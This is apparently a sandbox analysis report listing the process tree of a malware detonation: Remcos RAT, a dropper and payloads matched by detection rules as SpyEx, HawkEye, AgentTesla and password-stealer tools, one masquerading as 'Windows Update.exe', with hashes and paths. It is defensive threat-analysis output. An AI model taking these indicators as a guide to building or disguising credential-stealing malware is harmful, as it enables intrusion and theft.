                                                                                              Chronological Activities

                                                                                              Analysis Process: remcos.exe PID: 7100 Parent PID: 4200

                                                                                              General

                                                                                              Start time:13:39:04
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\moyvwyrrsmhoowrqsha"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000020.00000000.730677212.0000000000454000.00000002.00020000.sdmp, Author: Joe Security

                                                                                              Chronological Activities

                                                                                              Analysis Process: remcos.exe PID: 4720 Parent PID: 4200

                                                                                              General

                                                                                              Start time:13:39:07
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:C:\Users\user\AppData\Roaming\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wilgxqclgvztqcfubsndyj"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000021.00000000.740936585.0000000000454000.00000002.00020000.sdmp, Author: Joe Security

                                                                                              Chronological Activities

                                                                                              Analysis Process: remcos.exe PID: 6416 Parent PID: 3424

                                                                                              General

                                                                                              Start time:13:39:11
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:474112 bytes
                                                                                              MD5 hash:083D4CDE33E6721F595A468BB7D17ADA
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000000.745207581.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.746741703.0000000000454000.00000002.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000022.00000002.746856576.0000000000497000.00000004.00000020.sdmp, Author: Joe Security

                                                                                              Chronological Activities

                                                                                              Analysis Process: dwn.exe PID: 6476 Parent PID: 4200

                                                                                              General

                                                                                              Start time:13:39:12
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Remcos\dwn.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Remcos\dwn.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:2351104 bytes
                                                                                              MD5 hash:32EB10C12A29B38F13730CD1F5DCAD4D
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Visual Basic
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Avira
                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                              Chronological Activities

                                                                                              Analysis Process: 21.exe PID: 3064 Parent PID: 6476

                                                                                              General

                                                                                              Start time:13:39:19
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\21.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:900994 bytes
                                                                                              MD5 hash:6C9447A6F1B04C75D95594338AE61E06
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000024.00000002.796886573.0000000014770000.00000004.00000001.sdmp, Author: Joe Security

                                                                                              Chronological Activities

                                                                                              Analysis Process: 5.exe PID: 5212 Parent PID: 6476

                                                                                              General

                                                                                              Start time:13:39:20
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\5.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:852277 bytes
                                                                                              MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000025.00000002.801377726.00000000148F0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                              Chronological Activities

                                                                                              Analysis Process: 4.exe PID: 6140 Parent PID: 6476

                                                                                              General

                                                                                              Start time:13:39:22
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\4.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:586861 bytes
                                                                                              MD5 hash:78EDE0254C66FA9E667E4CEB88754E1C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000026.00000002.804765191.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000026.00000002.804765191.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                              Chronological Activities

                                                                                              Analysis Process: 21.exe PID: 1900 Parent PID: 3064

                                                                                              General

                                                                                              Start time:13:39:27
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\21.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\21.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:900994 bytes
                                                                                              MD5 hash:6C9447A6F1B04C75D95594338AE61E06
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:Visual Basic
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000002.930302567.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000000.789916886.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000000.785901828.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000000.791751960.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000000.787824676.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_SpyEx_1, Description: Yara detected SpyEx stealer, Source: 00000027.00000001.793855505.0000000000400000.00000040.00020000.sdmp, Author: Joe Security

                                                                                              Chronological Activities

                                                                                              Analysis Process: 5.exe PID: 1020 Parent PID: 5212

                                                                                              General

                                                                                              Start time:13:39:28
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\5.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\5.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:852277 bytes
                                                                                              MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.836807956.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000000.797700139.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000000.794595068.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.838115183.0000000003751000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.838248522.0000000004851000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.838427138.0000000004972000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000001.798523188.0000000000414000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000028.00000002.838343652.00000000048E0000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group

                                                                                              Chronological Activities

                                                                                              Analysis Process: 4.exe PID: 1260 Parent PID: 6140

                                                                                              General

                                                                                              Start time:13:39:29
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Local\Temp\4.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\4.exe" 0
                                                                                              Imagebase:0x400000
                                                                                              File size:586861 bytes
                                                                                              MD5 hash:78EDE0254C66FA9E667E4CEB88754E1C
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.937591060.0000000000616000.00000004.00000020.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.798585509.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.798585509.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.939895279.00000000023C0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.939895279.00000000023C0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000000.797295676.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000000.797295676.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.940282871.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000029.00000002.940282871.00000000028D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.943516760.00000000038D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.943516760.00000000038D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000001.801556734.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000001.801556734.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.940107209.0000000002522000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.940107209.0000000002522000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000029.00000002.932861331.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000029.00000002.932861331.0000000000400000.00000040.00000001.sdmp, Author: Joe Security

                                                                                              Chronological Activities

                                                                                              Analysis Process: Windows Update.exe PID: 3980 Parent PID: 1020

                                                                                              General

                                                                                              Start time:13:39:52
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:852277 bytes
                                                                                              MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:C, C++ or other language
                                                                                              Yara matches:
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002B.00000002.869118290.00000000147A0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              Antivirus matches:
                                                                                              • Detection: 100%, Joe Sandbox ML

                                                                                              Chronological Activities

                                                                                              Analysis Process: Windows Update.exe PID: 6084 Parent PID: 3980

                                                                                              General

                                                                                              Start time:13:39:58
                                                                                              Start date:07/12/2021
                                                                                              Path:C:\Users\user\AppData\Roaming\Windows Update.exe
                                                                                              Wow64 process (32bit):true
                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windows Update.exe"
                                                                                              Imagebase:0x400000
                                                                                              File size:852277 bytes
                                                                                              MD5 hash:3F332B62EEE0970F3189C689D5BD042A
                                                                                              Has elevated privileges:true
                                                                                              Has administrator privileges:true
                                                                                              Programmed in:.Net C# or VB.NET
                                                                                              Yara matches:
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002C.00000002.921284802.0000000007700000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000000.863600170.0000000000414000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000001.865541542.0000000000414000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.918744871.0000000004B42000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.918414776.0000000004AB0000.00000004.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Arnim Rupp
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.914779879.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: Joe Security
                                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000002C.00000002.918156876.0000000004A21000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
